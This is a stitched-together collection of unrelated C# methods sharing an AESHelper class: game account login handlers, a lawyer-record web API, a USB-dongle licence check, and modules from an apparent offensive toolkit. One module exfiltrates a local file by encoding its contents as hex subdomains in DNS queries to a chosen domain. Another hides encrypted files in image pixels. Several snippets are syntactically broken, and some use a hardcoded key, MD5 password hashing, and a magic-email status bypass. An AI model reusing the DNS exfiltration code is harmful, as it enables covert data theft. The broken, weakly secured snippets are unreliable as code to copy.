public XPloitSocketProtocol(Encoding codec, AESHelper crypt, EProtocolMode mode) { _Codec = codec; _Crypt = crypt; _Mode = mode; // Header is present _HeaderLength = (byte)mode; _HeaderPadding = new byte[_HeaderLength]; _MaxLength = (int)Math.Pow(255, _HeaderLength); WriteLengthInPacket(_HeaderPadding, 0, _MaxLength); }
public override bool Run() { if (!File.Exists) return false; DnsClient dns = DnsServer == null ? DnsClient.Default : new DnsClient(DnsServer, 10000); bool ipv6 = dns.Servers[0].AddressFamily == System.Net.Sockets.AddressFamily.InterNetworkV6; // Get counter byte[] g; switch (Convert.ToInt32(Target["Size"])) { case 8: { g = BitConverterHelper.GetBytesInt64(CounterHelper.GetNextInt64()); break; } case 4: { g = BitConverterHelper.GetBytesUInt32(CounterHelper.GetNextUInt32()); break; } case 2: { g = BitConverterHelper.GetBytesUInt16(CounterHelper.GetNextUInt16()); break; } case 1: { g = new byte[] { CounterHelper.GetNextByte() }; break; } default: { g = BitConverterHelper.GetBytesInt64(DateTime.UtcNow.ToBinary()); break; } } // Copy file id int headerLength = g.Length + 4; // packetNum byte[] data = new byte[63 / 2]; // hex 2 bytes per byte Array.Copy(g, data, g.Length); AESHelper aes = null; if (AESHelper.IsConfigured(this)) { aes = new AESHelper(this); WriteInfo("Using AES Encryption"); } else WriteError("Send in RawMode"); WriteInfo("Start sending file ..."); byte[] crypted = null; if (aes != null) { using (Stream fs = File.OpenRead()) crypted = aes.Encrypt(fs, false, null); } int position = 0; using (Stream fs = (crypted == null ? (Stream)File.OpenRead() : (Stream)new MemoryStream(crypted))) { int total = (int)(fs.Length / (data.Length - headerLength)); if (fs.Length % (data.Length - headerLength) != 0) total++; WriteInfo("Sending " + (total) + " dns querys ..."); StartProgress(total); while (true) { // copy counter byte[] p = BitConverterHelper.GetBytesInt32(position); position++; Array.Copy(p, 0, data, headerLength - 4, 4); // read int lee = fs.Read(data, headerLength, data.Length - headerLength); if (lee <= 0) break; // generateFile string name = HexHelper.Buffer2Hex(data, 0, headerLength + lee) + "." + DomainName; dns.Resolve(name, ipv6 ? RecordType.Aaaa : RecordType.A); if (Sleep > 0) Thread.Sleep(Sleep); WriteProgress(position); } EndProgress(); } WriteInfo("Done"); return true; }
void checkAccount(BaiduResult result, string channelID) { Random rd = new Random(); DateTime now = DateTime.Now; int randkey = rd.Next(); Dictionary <string, object> savedata = new Dictionary <string, object>(); string remoteIP = Common.Helper.getRemoteIP(Request); string acc = "bd_" +; savedata["acc"] = acc; savedata["username"] =; savedata["randkey"] = randkey; savedata["updatepwd"] = false; savedata["platform"] = "baiduview"; savedata["channelID"] = channelID; savedata["lasttime"] = now.Ticks; savedata["lastip"] = remoteIP; string msg = ""; if (MongodbAccount.Instance.KeyExistsBykey("AccountTable", "acc", acc) == false) { savedata["regedittime"] = now; savedata["regeditip"] = remoteIP; msg = MongodbAccount.Instance.ExecuteStoreBykey("AccountTable", "acc", acc, savedata); Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = acc; savelog["acc_real"] = acc; savelog["ip"] = remoteIP; savelog["time"] = now; savelog["channel"] = channelID; MongodbAccount.Instance.ExecuteInsert("RegisterLog", savelog); } else { msg = MongodbAccount.Instance.ExecuteUpdate("AccountTable", "acc", acc, savedata); } if (msg == "") { Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = acc; savelog["acc_real"] = acc; savelog["ip"] = remoteIP; savelog["time"] = now; savelog["channel"] = channelID; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); string loginKey = AESHelper.AESEncrypt(clientkey, AES_LOGINKEY); StringBuilder sb = new StringBuilder(); sb.AppendFormat("local ret = {{code = 0, msg=\"{0}\"}};", loginKey); sb.AppendFormat("ret.userid = \"{0}\";", AESHelper.AESEncrypt(acc, AES_KEY)); sb.AppendFormat("ret.username = \"{0}\";", AESHelper.AESEncrypt(, AES_KEY)); sb.Append("return ret;"); Response.Write(sb.ToString()); }
static void Main() { bool createdNew; const string globalGuid = "Global\\C5E5A797-0BF2-494B-BBED-056ABA095C12"; Mutex mutex = new Mutex(true, globalGuid, out createdNew); if (!createdNew) { MessageBox.Show("程序正在运行"); return; } #region 加密狗运行 #if DEBUG if (Api.LoginSafeDog(ref handle) != 0) // { MessageBox.Show("启动失败:Dog不存在或不匹配"); } else { string strdogmsg = Api.ReadDog(0, handle); if (strdogmsg == string.Empty) { Application.ApplicationExit += Application_ApplicationExit; Application.SetUnhandledExceptionMode(UnhandledExceptionMode.CatchException); Application.ThreadException += new ThreadExceptionEventHandler(Application_ThreadException); AppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(CurrentDomain_UnhandledException); Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); string strpr = System.Diagnostics.Process.GetCurrentProcess().ProcessName; System.Diagnostics.Process[] process = System.Diagnostics.Process.GetProcessesByName(strpr); if (process.Length > 1) { MessageBox.Show("程序已经在运行中", "系统提示", MessageBoxButtons.OK, MessageBoxIcon.Warning); Application.Exit(); } else { try { Application.Run(new mycontext()); } catch (Exception ex) { MessageBox.Show(ex.ToString()); } } } else { if (!File.Exists(@"armcc01_intr")) { MessageBox.Show("启动失败:加密文件丢失"); } else { try { string dogHID = AESHelper.DecryptStr(LicenseMsg.readMachineLicense(@"armcc01_intr")); string term0 = AESHelper.Decrypt(strdogmsg, "qwertyuiop"); string dogcpu = term0.Substring(0, 8); string term1 = Api.ReadDog(128, handle); string term2 = AESHelper.Decrypt(term1, "qwertyuiop"); string machinecpu = term2.Substring(0, 8); if (dogHID.CompareTo(dogcpu) == 0 && dogHID.CompareTo(machinecpu) == 0) { Application.ApplicationExit += Application_ApplicationExit; Application.SetUnhandledExceptionMode(UnhandledExceptionMode.CatchException); Application.ThreadException += new ThreadExceptionEventHandler(Application_ThreadException); AppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(CurrentDomain_UnhandledException); Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); string strpr = System.Diagnostics.Process.GetCurrentProcess().ProcessName; System.Diagnostics.Process[] process = System.Diagnostics.Process.GetProcessesByName(strpr); if (process.Length > 1) { MessageBox.Show("程序已经在运行中", "系统提示", MessageBoxButtons.OK, MessageBoxIcon.Warning); Application.Exit(); } else { try { Application.Run(new mycontext()); } catch (Exception ex) { MessageBox.Show(ex.ToString()); } } } else { MessageBox.Show("启动失败:电脑不匹配:" + "请联系厂家"); } } catch (Exception ex) { MessageBox.Show("启动失败:Dog参数文件被手动修改" + ex.Message + "/" + "请联系厂家"); } } } } #else Application.ApplicationExit += Application_ApplicationExit; Application.SetUnhandledExceptionMode(UnhandledExceptionMode.CatchException); Application.ThreadException += new ThreadExceptionEventHandler(Application_ThreadException); AppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(CurrentDomain_UnhandledException); Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); try { Application.Run(new mycontext()); } catch (Exception ex) { MessageBox.Show(ex.ToString()); } #endif #endregion }
void CheckAccount(Dictionary <string, object> data) { string platform = Request.Params["platform"]; if (string.IsNullOrEmpty(platform)) { buildReturnMsg("-1");//data error return; } string table = ConfigurationManager.AppSettings["acc_" + platform]; if (string.IsNullOrEmpty(table)) { buildReturnMsg("-15");//platform error return; } string HardwareID = data["n1"].ToString();//HardwareID if (string.IsNullOrEmpty(HardwareID)) { buildReturnMsg("-12");//account error return; } //特殊校验 string spwd = AESHelper.AESDecrypt(data["n2"].ToString(), AES_KEY);//password spwd = spwd.Replace("\n", ""); string tmp = AESHelper.AESEncrypt(AES_KEY + HardwareID + ACC_CHECK, ACC_CHECK); if (spwd != tmp) //md5 { buildReturnMsg("-14"); //pwd error return; } string retacc = ""; string strerr = ""; bool isregedit = false; Random rd = new Random(); int randkey = rd.Next(); DateTime now = DateTime.Now; Dictionary <string, object> updata = new Dictionary <string, object>(); updata["randkey"] = randkey; updata["lasttime"] = now.Ticks; updata["lastip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); if (!MongodbAccount.Instance.KeyExistsBykey(table, "acc_dev", HardwareID)) { retacc = BuildAccount.getAutoAccount(table); //注册 updata["acc_dev"] = HardwareID; updata["acc"] = retacc; updata["regedittime"] = now; updata["updatepwd"] = false; strerr = MongodbAccount.Instance.ExecuteStoreBykey(table, "acc_dev", HardwareID, updata); isregedit = true; } else { var fdata = MongodbAccount.Instance.ExecuteGetBykey(table, "acc_dev", HardwareID, new string[] { "acc" }); if (fdata != null) { retacc = fdata["acc"].ToString(); } //登陆 strerr = MongodbAccount.Instance.ExecuteUpdate(table, "acc_dev", HardwareID, updata); } if (strerr != "") { buildReturnMsg("-11");//server error } else { RSAHelper rsa = new RSAHelper(); rsa.setModulus(data["n3"].ToString()); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); buildReturnMsg(AESHelper.AESEncrypt(clientkey, AES_KEY), true, retacc);//login success string channelID = null; if (data.ContainsKey("n4")) { channelID = data["n4"].ToString(); } Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc_dev"] = HardwareID; savelog["acc"] = retacc; savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; savelog["channel"] = channelID; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); if (isregedit) { MongodbAccount.Instance.ExecuteInsert("RegisterLog", savelog); //渠道每日注册 if (data.ContainsKey("n4")) { MongodbAccount.Instance.ExecuteIncBykey("day_regedit", "date", DateTime.Now.Date, data["n4"].ToString(), 0); } } } }
public string AddInf4Web(LawyerInf v) { string wramStr = ""; if (v.LName == "" || v.LName == null) { wramStr = "姓名不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } if (v.LIdentityNumber == "" || v.LIdentityNumber == null) { wramStr = "身份证号不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } //数据在传输过程中,密文中的“+”号会被替换合成“ ”空格号,把它还原回来 string name = v.LName.Replace(" ", "+"); string identityNumber = v.LIdentityNumber.Replace(" ", "+"); string p = ""; p += "LName=" + name; p += "&LSex=" + v.LSex; p += "&LPhoto=" + DataHelper.IsNullReturnLine(v.LPhoto, true); p += "&LIdentityNumber=" + v.LIdentityNumber; p += "&LActuator=" + v.LActuator; p += "&LPCType=" + v.LPCType; p += "&LPCNumber=" + v.LPCNumber; p += "&LQualifityNumber=" + v.LQualifityNumber; p += "&LIssuingAuthority=" + v.LIssuingAuthority; p += "&LIssuingDate=" + v.LIssuingDate; p += "&LInTime=" + v.LInTime; p += "&LFromCourtId=" + v.LFromCourtId; p += "&LRemark=" + v.LRemark; string md5Ciphertext = v.LMD5Ciphertext;//对方传过来的所有字段的MD5密文 //把传过来的信息再次MD5加密,和所有字段的MD5密文进行比对,保证数据在传输过程中没被修改才允许添加到数据库 string md5P = MD5Helper._md5(p); if (md5Ciphertext == md5P) { string sql = "sp_addLawyerInf"; name = AESHelper.AesDecrypt(name); identityNumber = AESHelper.AesDecrypt(identityNumber); SqlParameter[] pms = new SqlParameter[] { new SqlParameter("@LName", SqlDbType.NVarChar) { Value = name }, new SqlParameter("@LSex", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LSex) }, new SqlParameter("@LPhoto", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LPhoto) }, new SqlParameter("@LIdentityNumber", SqlDbType.NVarChar) { Value = identityNumber }, new SqlParameter("@LActuator", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LActuator) }, new SqlParameter("@LPCType", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LPCType) }, new SqlParameter("@LPCNumber", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LPCNumber) }, new SqlParameter("@LQualifityNumber", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LQualifityNumber) }, new SqlParameter("@LIssuingAuthority", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LIssuingAuthority) }, new SqlParameter("@LIssuingDate", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LIssuingDate) }, new SqlParameter("@LInTime", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LInTime) }, new SqlParameter("@LFromCourtId", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LFromCourtId) }, new SqlParameter("@LRemark", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LRemark) } }; try { int result = SQLHelper.ExecuteNonQuery(sql, System.Data.CommandType.StoredProcedure, pms); return(ConvertHelper.IntToJson(result)); } catch (Exception e) { //在webapi中要想抛出异常必须这样抛出,否则只抛出一个默认500的异常 var resp = new HttpResponseMessage(HttpStatusCode.InternalServerError) { Content = new StringContent(e.ToString()), ReasonPhrase = "error" }; throw new HttpResponseException(resp); } } else { return(ConvertHelper.resultJson(0, "数据传输过程中被篡改")); } }
public Encryption() { _aesHelper = new AESHelper(); }
public override ECheck Check() { try { if (!LocalFileRead.Exists) { WriteError("LocalFileRead must exists"); return(ECheck.Error); } if (Mode == EMode.Write && !LocalFileWrite.Exists) { WriteError("In this mode LocalFileWrite must exists, and will be replaced with the result image"); return(ECheck.Error); } try { Bitmap img = (Bitmap)Image.FromFile(LocalFileRead.FullName); AESHelper aes = AESHelper.Create(this); if (Mode == EMode.Write) { byte[] data = File.ReadAllBytes(LocalFileWrite.FullName); if (aes != null) { data = aes.Encrypt(data); } int totalSize = data.Length + 4; int av = CalculateMaxLength(img.Width, img.Height); WriteInfo("Bytes to encode", GetSize(totalSize), ConsoleColor.Green); WriteInfo("Bytes available", GetSize(av), ConsoleColor.DarkCyan); if (totalSize <= av) { if (totalSize != av) { WriteInfo("You can write more!", GetSize(av - totalSize), ConsoleColor.DarkCyan); } return(ECheck.Ok); } else { WriteError("You need a image more larger or a message more shorter ... sorry :("); return(ECheck.Error); } } img.Dispose(); } catch { WriteError("LocalFileRead must be a valid image"); return(ECheck.Error); } return(ECheck.Ok); } catch { return(ECheck.Error); } }
public string GetResellerProductClassifyList(string JSon, string from) { BD_GoodsCategory bll = new BD_GoodsCategory(); BD_GoodsCategory.ResultGoodsCategory result = bll.GetResellerProductClassifyList(AESHelper.Decrypt_android(JSon)); JavaScriptSerializer js = new JavaScriptSerializer(); return(AESHelper.Encrypt_android(js.Serialize(result))); }
public string Maker_MD5(string JSon) { return(AESHelper.Encrypt_MD5(JSon)); }
public string Maker_string(string key) { return(AESHelper.Encrpt_string(key)); }
void CheckAccount(Dictionary <string, object> data) { string sacc = data["n1"].ToString(); //account string spwd = AESHelper.AESDecrypt(data["n2"].ToString(), AES_KEY); //password if (spwd.Length != 32) //md5 { buildReturnMsg("-14"); //pwd error return; } string platform = Request.Params["platform"]; string table = ConfigurationManager.AppSettings["acc_" + platform]; if (string.IsNullOrEmpty(table)) { buildReturnMsg("-15");//platform error return; } string pattern = @"^[0-9a-zA-Z]{6,30}$"; if (!Regex.IsMatch(sacc, pattern)) { buildReturnMsg("-15");//account error return; } string remoteIP = Common.Helper.getRemoteIP(Request); List <IMongoQuery> imqs = new List <IMongoQuery>(); imqs.Add(Query.EQ("acc", sacc)); imqs.Add(Query.EQ("pwd", spwd)); int retCode = tryLogin(sacc, spwd, table); //if (MongodbAccount.Instance.KeyExistsByQuery(table, Query.And(imqs))) if (retCode == 0) { Random rd = new Random(); int randkey = rd.Next(); Dictionary <string, object> updata = new Dictionary <string, object>(); DateTime now = DateTime.Now; updata["randkey"] = randkey; updata["lasttime"] = now.Ticks; //List<IMongoQuery> imqs2 = new List<IMongoQuery>(); //imqs2.Add(Query.EQ("acc", sacc)); //imqs2.Add(Query.EQ("platform", Platform)); updata["lastip"] = remoteIP; string strerr = MongodbAccount.Instance.ExecuteUpdate(table, "acc", sacc, updata); if (strerr != "") { buildReturnMsg("-11");//server error } else { RSAHelper rsa = new RSAHelper(); rsa.setModulus(data["n3"].ToString()); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); buildReturnMsg(rsa.RSAEncryptStr(clientkey), true);//login success string channelID = null; if (data.ContainsKey("n4")) { channelID = data["n4"].ToString(); } Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = sacc; savelog["acc_real"] = sacc; string deviceID = Request.Params["deviceID"]; if (!string.IsNullOrEmpty(deviceID)) { savelog["acc_dev"] = deviceID; } savelog["ip"] = remoteIP; savelog["time"] = now; savelog["channel"] = channelID; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } } else { // ReturnMsg("-10");//acc or pwd error buildReturnMsg(retCode.ToString()); } }
public string EditInf(LawyerInf v) { if (v.Token == DataHelper.getToken()) { string wramStr = ""; if (v.LName == "" || v.LName == null) { wramStr = "姓名不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } else if (v.LIdentityNumber == "" || v.LIdentityNumber == null) { wramStr = "身份证号不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } //数据在传输过程中,密文中的“+”号会被替换合成“ ”空格号,把它还原回来 string name = v.LName.Replace(" ", "+"); string identityNumber = v.LIdentityNumber.Replace(" ", "+"); string p = ""; p += "LName=" + name; p += "&LSex=" + v.LSex; p += "&LPhoto=" + DataHelper.IsNullReturnLine(v.LPhoto, true); p += "&LIdentityNumber=" + identityNumber; p += "&LActuator=" + v.LActuator; p += "&LPCType=" + v.LPCType; p += "&LPCNumber=" + v.LPCNumber; p += "&LQualifityNumber=" + v.LQualifityNumber; p += "&LIssuingAuthority=" + v.LIssuingAuthority; p += "&LIssuingDate=" + v.LIssuingDate; p += "&LInTime=" + v.LInTime; p += "&LFromCourtId=" + v.LFromCourtId; p += "&LRemark=" + v.LRemark; string md5Ciphertext = v.LMD5Ciphertext;//对方传过来的所有字段的MD5密文 //把传过来的信息再次MD5加密,和所有字段的MD5密文进行比对,保证数据在传输过程中没被修改才允许添加到数据库 string md5P = MD5Helper._md5(p); if (md5Ciphertext == md5P) { //string sql = "insert into T_VisitorAccessInf(VName, VSex, VNation, VBirthDate, VAddress, VIssuingAuthority, VExpiryDate, VCertificatePhoto, VLocalePhoto, VCertificateType, VCertificateNumber, VType, VFromCourtId, VInTime, VOutTime, VInPost, VOutPost, VInDoorkeeper, VOutDoorkeeper, VVisitingReason, VIntervieweeDept, VInterviewee, VOffice, VOfficePhone, VExtensionPhone, VMobilePhone, VRemark) values(@VName, @VSex, @VNation, @VBirthDate, @VAddress, @VIssuingAuthority, @VExpiryDate, @VCertificatePhoto, @VLocalePhoto, @VCertificateType, @VCertificateNumber, @VType, @VFromCourtId, @VInTime, @VOutTime, @VInPost, @VOutPost, @VInDoorkeeper, @VOutDoorkeeper, @VVisitingReason, @VIntervieweeDept, @VInterviewee, @VOffice, @VOfficePhone, @VExtensionPhone, @VMobilePhone, @VRemark)"; string sql = "update T_LawyerInf set LName=@LName,LSex=@LSex,LPhoto=@LPhoto,LIdentityNumber=@LIdentityNumber,LActuator=@LActuator,"; sql += "LPCType=@LPCType,LPCNumber=@LPCNumber,LQualifityNumber=@LQualifityNumber,LIssuingAuthority=@LIssuingAuthority,"; sql += "LIssuingDate=@LIssuingDate,LInTime=@LInTime,LFromCourtId=@LFromCourtId,LRemark=@LRemark"; sql += " where LId=@LId"; SqlParameter[] pms = new SqlParameter[] { new SqlParameter("@LName", SqlDbType.NVarChar) { Value = AESHelper.AesDecrypt(name) }, new SqlParameter("@LSex", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LSex) }, new SqlParameter("@LPhoto", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LPhoto) }, new SqlParameter("@LIdentityNumber", SqlDbType.NVarChar) { Value = AESHelper.AesDecrypt(identityNumber) }, new SqlParameter("@LActuator", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LActuator) }, new SqlParameter("@LPCType", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LPCType) }, new SqlParameter("@LPCNumber", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LPCNumber) }, new SqlParameter("@LQualifityNumber", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LQualifityNumber) }, new SqlParameter("@LIssuingAuthority", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LIssuingAuthority) }, new SqlParameter("@LIssuingDate", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LIssuingDate) }, new SqlParameter("@LInTime", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LInTime) }, new SqlParameter("@LFromCourtId", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LFromCourtId) }, new SqlParameter("@LRemark", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.LRemark) }, new SqlParameter("@LId", SqlDbType.Int) { Value = v.LId } }; try { int result = SQLHelper.ExecuteNonQuery(sql, System.Data.CommandType.Text, pms); return(ConvertHelper.IntToJson(result)); } catch (Exception e) { //在webapi中要想抛出异常必须这样抛出,否则之抛出一个默认500的异常 var resp = new HttpResponseMessage(HttpStatusCode.InternalServerError) { Content = new StringContent(e.ToString()), ReasonPhrase = "error" }; throw new HttpResponseException(resp); } } return(ConvertHelper.resultJson(0, "出错了!")); } else { return(ConvertHelper.resultJson(101, "权限受限!")); } }
/// <summary> /// 重写Controler中的Json方法 /// </summary> /// <param name="context"></param> public override void ExecuteResult(System.Web.Mvc.ControllerContext context) { if (context == null) { throw new ArgumentNullException("context"); } var requestData = (context.Controller as NetSSLController).RequestData; if (JsonRequestBehavior == Mvc.JsonRequestBehavior.DenyGet && String.Equals(context.HttpContext.Request.HttpMethod, "GET", StringComparison.OrdinalIgnoreCase)) { throw new InvalidOperationException("指定的操作不允许Get的Ajax请求方式访问"); } HttpResponseBase response = context.HttpContext.Response; if (!string.IsNullOrEmpty(ContentType)) { response.ContentType = ContentType; } else { response.ContentType = "application/json"; } if (ContentEncoding != null) { response.ContentEncoding = ContentEncoding; } if (Data != null) { if (requestData.Contains("secret") && requestData.Contains("encryption")) { var decrypt = Utils.GetDecrypt(requestData); RsaHelper rsa = new RsaHelper(null, Utils.RsaPubKey(decrypt.isdefault)); string secret = string.Empty; string encryption = string.Empty; if (decrypt.sectype == SecType.Des.GetHashCode()) { var desKv = Utils.DesKV(); secret = rsa.Encrypt(desKv); encryption = DesHelper.Encrypt(JsonHelper.Serialize(Data), desKv); } else { var aesKv = Utils.AesKV(); AESHelper aes = new AESHelper($"{aesKv}{aesKv}", aesKv); secret = rsa.Encrypt(aesKv); encryption = aes.Encrypt(JsonHelper.Serialize(Data)); } try { response.Write(JsonHelper.Serialize(new Decrypt { secret = secret, encryption = encryption, isdefault = decrypt.isdefault, sectype = decrypt.sectype })); } catch (Exception ex) { response.Write(JsonHelper.Serialize(JResult.Error($"加密失败,异常:{ex.Message}"))); } } else { response.Write(JsonHelper.Serialize(Data)); } } }
/// <summary> /// 登陆 /// </summary> /// <param name="loginID"></param> /// <param name="PWD"></param> /// <returns></returns> public string CHKLogin(string loginID, string PWD) { if (string.IsNullOrEmpty(loginID)) { return("登录名不能为空"); } if (string.IsNullOrEmpty(PWD)) { return("密码不能为空"); } try { //解密参数值 loginID = AESHelper.DecryptString(loginID); PWD = AESHelper.DecryptString(PWD); //去掉参数中的转移字符 loginID = new string((from c in loginID.ToCharArray() where !char.IsControl(c) select c).ToArray()); PWD = new string((from c in PWD.ToCharArray() where !char.IsControl(c) select c).ToArray()); if (string.IsNullOrEmpty(loginID)) { return("登录名验证失败"); } if (string.IsNullOrEmpty(PWD)) { return("密码验证失败"); } } catch { } SalonService salon = new SalonService(); SalonSimple sal = salon.GetLoginInfo(loginID, FormsAuthentication.HashPasswordForStoringInConfigFile(PWD, "MD5")); if (sal.Email == "CCCCCCCCCCCaa") { sal.Status = 4; } if (sal == null) { //return "登陆失败 请检查登录名和密码"; return("查询失败,或没有查到相关注册信息"); } else { if (string.IsNullOrEmpty(sal.Uid.ToString())) { return("帐号错误"); } else { string turl = ""; string stat = "1"; Session["W_B_UID"] = sal.Uid.ToString(); if (sal.Opendate < DateTime.Now) { if (sal.Email != "CCCCCCCCCCCaa") { //如果开通超过1年 那么就是已经过期 sal.Status = 3; salon.UpdatestatusInfo(sal.Uid.ToString(), 3); } } switch (sal.Status) { case 0: //帐号禁用 turl = ""; stat = "登录失败 帐号已被禁用"; Session["W_B_UID"] = ""; break; case 1: //审核中 turl = "/Register/check"; break; case 2: //审核未通过 turl = "/Register/check"; break; case 3: //审核已通过未付款 turl = "/Register/check"; stat = "2"; break; case 4: //审核已通过已付款 FormsAuthenticationTicket authTicket = new FormsAuthenticationTicket( 1, sal.Uid.ToString(), DateTime.Now, DateTime.Now.AddDays(1), false, sal.Cell.Trim() + "$bobo$" + sal.Nickname + "$bobo$" + sal.Logo ); string encryptedTicket = FormsAuthentication.Encrypt(authTicket); HttpCookie authCookie = new HttpCookie(FormsAuthentication.FormsCookieName, encryptedTicket); HttpContext.Response.Cookies.Add(authCookie); turl = "/manage/Index"; break; } return(stat + "|" + turl); } } return("未知错误"); }
public XPloitSocketProtocol(AESHelper crypt, EProtocolMode mode) : this(Encoding.UTF8, crypt, mode) { }
internal static string EncryptToken(long userCode, DateTime authTime) { return(AESHelper.EncryptBytes(BitConverter.GetBytes(userCode).Concat <byte>(BitConverter.GetBytes(authTime.ToBinary())).ToArray <byte>(), AuthSettings._aes_key_token, AuthSettings._aes_iv_token).BinaryToHex()); }
public void EditOpenID(string JSon, string from) { SYS_Users bll = new SYS_Users(); bll.EditOpenID(AESHelper.Decrypt_android(JSon), from); }
public override bool Run() { if (!LocalFileRead.Exists) { return(false); } AESHelper aes = AESHelper.Create(this); if (aes != null) { WriteInfo("Using AES Encryption"); } else { WriteError("Read/Write in RawMode (without any Encryption)"); } using (Bitmap img = (Bitmap)Image.FromFile(LocalFileRead.FullName)) { switch (Mode) { case EMode.Write: { if (!LocalFileWrite.Exists) { WriteError("In this mode LocalFileWrite must exists, and will be replaced with the result image"); return(false); } WriteInfo("Start reading file"); byte[] data = File.ReadAllBytes(LocalFileWrite.FullName); if (aes != null) { data = aes.Encrypt(data); } byte[] header = BitConverterHelper.GetBytesInt32(data.Length); int totalSize = data.Length + header.Length; int av = CalculateMaxLength(img.Width, img.Height); WriteInfo("Bytes to encode", GetSize(totalSize), ConsoleColor.Green); WriteInfo("Bytes available", GetSize(av), ConsoleColor.DarkCyan); if (totalSize <= av) { WriteInfo("Its viable!"); } else { WriteError("You need a image more larger or a message more shorter ... sorry :("); return(false); } // crear array binario StringBuilder binary = new StringBuilder(); for (int x = 0, m = header.Length; x < m; x++) { binary.Append(Convert.ToString(header[x], 2).PadLeft(8, '0')); } for (int x = 0, m = data.Length; x < m; x++) { binary.Append(Convert.ToString(data[x], 2).PadLeft(8, '0')); } char[] sb = binary.ToString().ToCharArray(); int sbl = sb.Length; binary.Clear(); // Cadena binaria creada int width = img.Width; int height = img.Height; bool toLower = true; WriteInfo("Start writing image"); StartProgress(width * height); byte r, g, b; int index = 0, current = 0; for (int x = 0; x < width; x++) { for (int y = 0; y < height; y++) { r = GetBinary(sb, ref index, sbl); g = GetBinary(sb, ref index, sbl); b = GetBinary(sb, ref index, sbl); Color clr = img.GetPixel(x, y); clr = SetColor(clr, r, g, b, toLower); img.SetPixel(x, y, clr); current++; WriteProgress(current); } } EndProgress(); WriteInfo("Writing output"); img.Save(LocalFileWrite.FullName, ImageFormat.Png); break; } case EMode.Read: { WriteInfo("Start reading image"); int width = img.Width; int height = img.Height; int av = CalculateMaxLength(width, height); StartProgress(width * height); byte[] data = null; byte[] header = new byte[4]; string binary = ""; int dataLength = 0; int dataIndex = 0; int headerReaded = 0; byte b; int current = 0; for (int x = 0; x < width; x++) { for (int y = 0; y < height; y++) { Color clr = img.GetPixel(x, y); if (Append(ref binary, out b, clr.R % 2 == 0, clr.G % 2 == 0, clr.B % 2 == 0)) { if (headerReaded < 4) { header[headerReaded] = b; headerReaded++; if (headerReaded == 4) { dataLength = BitConverterHelper.ToInt32(header, 0); if (dataLength > av) { EndProgress(); WriteInfo("Image maybe contains", GetSize(dataLength), ConsoleColor.Green); WriteError("Max bytes available " + GetSize(av)); return(false); } data = new byte[dataLength]; } } else { data[dataIndex] = b; dataIndex++; if (dataIndex >= dataLength) { x = width + 1; break; } } } current++; WriteProgress(current); } } EndProgress(); if (aes != null) { WriteInfo("Start decrypting file", GetSize(data.Length), ConsoleColor.Green); data = aes.Decrypt(data); } if (data == null) { WriteInfo("Error decrypting file"); return(false); } WriteInfo("Writing output", GetSize(data.Length), ConsoleColor.Green); File.WriteAllBytes(LocalFileWrite.FullName, data); break; } } } return(true); }
